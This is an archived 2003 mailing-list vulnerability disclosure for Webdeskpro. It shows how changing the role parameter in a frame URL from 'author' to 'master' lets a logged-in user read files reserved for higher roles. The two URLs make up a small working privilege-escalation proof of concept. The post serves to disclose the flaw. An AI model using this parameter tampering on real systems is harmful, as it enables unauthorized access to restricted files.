Webdeskpro role modify vulnerability

From: CK (sangsangat_private)
Date: Mon Aug 11 2003 - 00:24:57 PDT

  • Next message: G00db0y: "ZH2003-20SA (security advisory): Stellar Docs Path Disclosure and Security Leak"

    
     ('binary' encoding is not supported, stored as-is)
    Webdeskpro has 4 role authority levels- author, editor, administrator, 
    master
    We found a vulnerability in Webdeskpro UI. 
    After login, if we modify some role variables as follows , we can read 
    upper role level’s files.
    
    
    
    Role Modification
    
    <FRAME SRC="/iw/webdesk/teamsite/webdeskpro/webdeskpro%5floginparams.jsp?
    cgi%5furl=/iw-bin/iwcgi.cgi/list%3fcache%255fcounter%3d1057308332186%26iw%
    255fsession%
    3d52616e646f6d49568abc54f9c2ffbf12d9c47429d545c48bbef8b0850cff4a954e682ef59
    7690fd8a084e8d13858ea41%26path%3dnone%26role%3dauthor%26session%
    3d52616e646f6d49568abc54f9c2ffbf12d9c47429d545c48bbef8b0850cff4a954e682ef59
    7690fd8a084e8d13858ea41%26want%255fstart%255fmain%3dtrue&role=author" 
    NAME="TopFrame" SCROLLING=no FRAMEBORDER="no" MARGINHEIGHT=1 MARGINWIDTH=1 
    NORESIZE>
    
    
    we can modify upper source as follows
    
    
    <FRAME SRC="/iw/webdesk/teamsite/webdeskpro/webdeskpro%5floginparams.jsp?
    cgi%5furl=/iw-bin/iwcgi.cgi/list%3fcache%255fcounter%3d1057308332186%26iw%
    255fsession%
    3d52616e646f6d49568abc54f9c2ffbf12d9c47429d545c48bbef8b0850cff4a954e682ef59
    7690fd8a084e8d13858ea41%26path%3dnone%26role%3dmaster%26session%
    3d52616e646f6d49568abc54f9c2ffbf12d9c47429d545c48bbef8b0850cff4a954e682ef59
    7690fd8a084e8d13858ea41%26want%255fstart%255fmain%3dtrue&role=master" 
    NAME="TopFrame" SCROLLING=no FRAMEBORDER="no" MARGINHEIGHT=1 MARGINWIDTH=1 
    NORESIZE>
    



    This archive was generated by hypermail 2b30 : Mon Aug 11 2003 - 11:02:10 PDT